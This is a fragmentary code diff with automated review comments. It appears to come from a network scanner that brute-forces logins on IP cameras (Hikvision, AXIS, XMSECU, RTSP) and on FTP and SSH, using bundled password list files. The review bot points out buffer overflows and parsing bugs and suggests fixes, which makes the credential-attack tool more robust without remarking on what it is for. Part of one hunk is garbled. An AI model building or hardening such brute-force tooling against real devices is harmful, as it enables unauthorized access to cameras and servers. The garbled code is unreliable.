sprintf(fileName, "./" DIR_NAME "%s_%s/hikkafile_%s_part_%d.csv", date, Utils::getCurrentTarget().c_str(), date, HikVis::hikPart); FILE *f = fopen(fileName, "a"); if (f != NULL) { char string[1024] = { 0 }; 
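Review bot: `sprintf(title, "%s %s", lps.other, finalstr)` writes two unbounded strings into `char title[512]`; `finalstr` appears to be the header text taken from the remote response and `TITLE_MAX_SIZE` is itself 512, so the pair can exceed the buffer. Use `snprintf(title, sizeof(title), "%s %s", lps.other, finalstr);` or build a `std::string`. The later parseFlag hunks repeat the pattern with `char newIP[128]` (`sprintf(newIP, "rtsp://%s:%d/", ipRaw, port)`) and `char ipNew[256]`. The commented-out `fillGlobalLogData` call should be removed or restored rather than left in place.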
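Review bot: `std::stoi(location.substr(portPos + 1, portPosEnd))` in equivRedirectHandler passes an end position where `substr` expects a length, and `std::stoi` throws `std::invalid_argument` or `std::out_of_range` when the text after the colon is not a number that fits an int; `location` is parsed from the response, so the remote side decides whether this throws. Use `location.substr(portPos + 1, portPosEnd - portPos - 1)`, catch the exception (or parse with `strtol`), and reject values outside 1–65535. `find` and `find_first_of` return `std::size_t`, so compare against `std::string::npos` instead of storing the result in an `int`. The `std::stoi` calls added in the two handleFramesets hunks need the same guard.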
@@ -3047,8 +3056,8 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con HikVis::rviCounter = 0; HikVis::rviPart++; } - sprintf(fileName, "./result_files-%s/rvifile_%s(%s)_part_%d.xml", - date, date, Utils::getStartTime().c_str(), HikVis::rviPart); + sprintf(fileName, "./" DIR_NAME "%s_%s/rvifile_%s(%s)_part_%d.xml", + date, Utils::getCurrentTarget().c_str(), date, Utils::getStartTime().c_str(), HikVis::rviPart); char string[1024] = { 0 }; FILE *fc = fopen(fileName, "r"); @@ -3132,8 +3141,15 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con } else if (flag == 34) //Hikvision ip cam { - if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){ - _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size); + char ipNew[256] = { 0 }; + if (strstri(ip, "https://") != NULL) { + sprintf(ipNew, "https://%s", ipRaw); + } + else { + sprintf(ipNew, "http://%s", ipRaw); + } + if (_specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){ + _specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size); } } else if (flag == 35) //EasyCam @@ -3269,11 +3285,9 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con } else if (flag == 59) //RTSP { - //char newIP[128] = {0}; - //strcpy(newIP, "rtsp://"); - //strncat(newIP, ipRaw, 96); - //strcat(newIP, "/"); - _specRTSPBrute(ipRaw, port, header.c_str(), flag, "RTSP", cp, size); + char newIP[128] = {0}; + sprintf(newIP, "rtsp://%s:%d/", ipRaw, port); + _specRTSPBrute(newIP, port, header.c_str(), flag, "RTSP", cp, size); } else if (flag == 60) //ACTi { 
@@ -3283,7 +3297,11 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con { _specWEBIPCAMBrute(ip, port, "[AirOS] WEB IP Camera", flag, "WEB Authorization", cp, size, "AirOS", &cookie); } - + else if (flag == 62) //XMSECU + { + _specWEBIPCAMBrute(ip, port, "[XMSECU] WEB IP Camera", flag, "WEB Authorization", cp, size, "XMSECU", &cookie); + } + else if (flag == 20) //AXIS Camera { if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) { @@ -3359,19 +3377,26 @@ std::string handleRedirects(std::string *buffcpy, char* ip, int port) { counter.iterationCount = 0; std::string location = std::string(ip); const std::string &locationEquiv = equivRedirectHandler(buffcpy, ip, port, &counter); - location += locationEquiv; + if (locationEquiv.find("http") == 0) { + location = locationEquiv; + } + else { + location += locationEquiv; + } counter.iterationCount = 0; if (Utils::ustrstr((const std::string *) buffcpy, " 0) { + if (Utils::ustrstr(location, "http") != -1) { + location = locationJS; + } + else { + location += locationJS; + } } }; - + return location; } int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, int flag, char *cp) { @@ -3452,7 +3477,15 @@ int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, i newPort = port; int portPos = location.find(":", 8); if (-1 != portPos) { - newPort = std::stoi(location.substr(portPos + 1)); + int secPos = location.find("/", 8); + if (-1 != secPos) { + if (portPos < secPos) { + newPort = std::stoi(location.substr(portPos + 1, secPos - portPos - 1)); + } + } + else { + newPort = std::stoi(location.substr(portPos + 1)); + } } newIP = location; } 
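Review bot: In handleRedirects the new JS-redirect branch tests `Utils::ustrstr(location, "http") != -1`, which inspects the accumulated `location` rather than `locationJS`, whereas the branch added just above tests the redirect target itself with `locationEquiv.find("http") == 0`. If the intent is to replace `location` only when the new target is absolute, the condition should mirror the first branch: `if (locationJS.find("http") == 0)`. As written, any `location` that already contains "http" is overwritten even by a relative `locationJS`. Part of this hunk is garbled on the page, so the surrounding condition should be checked against the file.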
@@ -3463,7 +3496,15 @@ int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, i newPort = 443; int portPos = location.find(":", 8); if (-1 != portPos) { - newPort = std::stoi(location.substr(portPos + 1)); + int secPos = location.find("/", 8); + if (-1 != secPos) { + if (portPos < secPos) { + newPort = std::stoi(location.substr(portPos + 1, secPos - portPos - 1)); + } + } + else { + newPort = std::stoi(location.substr(portPos + 1)); + } } newIP = location; } @@ -3471,7 +3512,7 @@ int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, i newIP += location; } } - stt->doEmitionYellowFoundData("Location: " + QString(newIP.c_str()) + "; Port: " + QString::number(newPort)); + //stt->doEmitionYellowFoundData("Location: " + QString(newIP.c_str()) + "; Port: " + QString::number(newPort)); parseFlag(flag, (char*)newIP.c_str(), ipRaw, newPort, buffcpyOrig, header, cp); return flag; } diff --git a/mainResources.h b/mainResources.h index eada05d..076a1bc 100644 --- a/mainResources.h +++ b/mainResources.h 
@@ -88,21 +88,22 @@ typedef int BOOL; #define TITLE_MAX_SIZE 512 #define COOKIE_MAX_SIZE 1024 -#define TYPE1 "camera" -#define TYPE2 "other" -#define TYPE3 "auth" -#define TYPE4 "ftp" -#define TYPE5 "ssh" +#define TYPE1 "camera" +#define TYPE2 "other" +#define TYPE3 "auth" +#define TYPE4 "ftp" +#define TYPE5 "ssh" +#define DIR_NAME "results_" #define PWD_LIST_FOLDER "./pwd_lists/" -#define LOGIN_FN PWD_LIST_FOLDER"login.txt" -#define PASS_FN PWD_LIST_FOLDER"pass.txt" -#define FTP_LOGIN_FN PWD_LIST_FOLDER"ftplogin.txt" -#define FTP_PASS_FN PWD_LIST_FOLDER"ftppass.txt" -#define WF_LOGIN_FN PWD_LIST_FOLDER"wflogin.txt" -#define WF_PASS_FN PWD_LIST_FOLDER"wfpass.txt" -#define SSH_PASS_FN PWD_LIST_FOLDER"sshpass.txt" -#define NEGATIVE_FN PWD_LIST_FOLDER"negatives.txt" +#define LOGIN_FN PWD_LIST_FOLDER "login.txt" +#define PASS_FN PWD_LIST_FOLDER "pass.txt" +#define FTP_LOGIN_FN PWD_LIST_FOLDER "ftplogin.txt" +#define FTP_PASS_FN PWD_LIST_FOLDER "ftppass.txt" +#define WF_LOGIN_FN PWD_LIST_FOLDER "wflogin.txt" +#define WF_PASS_FN PWD_LIST_FOLDER "wfpass.txt" +#define SSH_PASS_FN PWD_LIST_FOLDER "sshpass.txt" +#define NEGATIVE_FN PWD_LIST_FOLDER "negatives.txt" #define HTTP_FILE_STYLE "